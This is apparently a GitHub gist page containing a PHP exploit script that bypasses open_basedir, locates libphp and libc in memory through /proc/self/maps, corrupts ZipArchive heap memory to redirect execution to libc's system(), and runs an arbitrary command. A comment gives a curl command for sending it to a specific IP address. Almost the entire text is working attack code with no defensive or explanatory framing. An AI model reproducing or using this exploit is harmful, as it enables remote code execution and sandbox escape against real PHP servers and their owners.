Skip to content

Instantly share code, notes, and snippets.

@neex neex/exploit.php Secret
Created Sep 17, 2019

Embed
What would you like to do?
// <?php // <- to make GitHub syntax highlighter happy
// Run this with `curl 'http://52.53.55.151:11514/' -F "rce=<exploit.php"`.
$command = "your command here";
$system_libc_offset = 0x000000000004f440;
$stdclass_instance_size = 40;
$string_header_size = 32;
$script_name = "/tmp/xx"; // must be exactly 7 characters
$good_archive_name = "/tmp/".str_repeat("A", $stdclass_instance_size - 6);
$bad_archive_name = "/etc/passwd";
$scan_region_length = 500000;
function bypass_openbasedir() {
chdir("/tmp");
mkdir("posos");
chdir("posos");
ini_set("open_basedir", "..");
ini_get("open_basedir");
chdir("..");
chdir("..");
ini_set("open_basedir", "/");
if (ini_get("open_basedir") != "/") die("open_basedir bypass failed");
}
function get_code_address_range($lib) {
$maps = file_get_contents("/proc/self/maps");
preg_match_all("/^([0-9a-f]*)-([0-9a-f]*) r-xp .* ([^ ]*)$/m", $maps, $entries, PREG_SET_ORDER);
foreach ($entries as $entry) {
if ($entry[3] === $lib) {
$start = $entry[1];
$end = $entry[2];
return array(intval($start, 16), intval($end, 16));
}
}
}
bypass_openbasedir();
file_put_contents($script_name, "#!/bin/sh\n$command\n");
chmod($script_name, 0777);
[$libphp_start, $libphp_end] = get_code_address_range("/usr/lib/apache2/modules/libphp8.so");
[$libc_start, $libc_end] = get_code_address_range("/lib/x86_64-linux-gnu/libc-2.27.so");
$system_addr = $libc_start + $system_libc_offset;
$archive = new ZipArchive();
$archive->open($good_archive_name, ZipArchive::CREATE);
$archive->open($bad_archive_name, ZipArchive::CREATE);
$memory_view = str_repeat("A", $stdclass_instance_size - $string_header_size);
$archive->open($bad_archive_name, ZipArchive::CREATE);
$instance = new StdClass();
if (strlen($memory_view) < $scan_region_length) die("Exploit failed");
$f = fopen("php://filter/convert.base64-encode/resource=/etc/passwd", "r");
for ($offset = 0; $offset < $scan_region_length; $offset++) {
$fields = unpack("Q*", substr($memory_view, $offset, 16));
if ($fields[1] >= $libphp_start && $fields[1] <= $libphp_end &&
$fields[2] >= $libphp_start && $fields[2] <= $libphp_end) {
$payload = "/tmp/xx\x00".pack("Q", $system_addr);
for ($i = 0; $i < 16; $i++) {
$memory_view[$offset + $i] = $payload[$i];
}
}
}
fclose($f);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.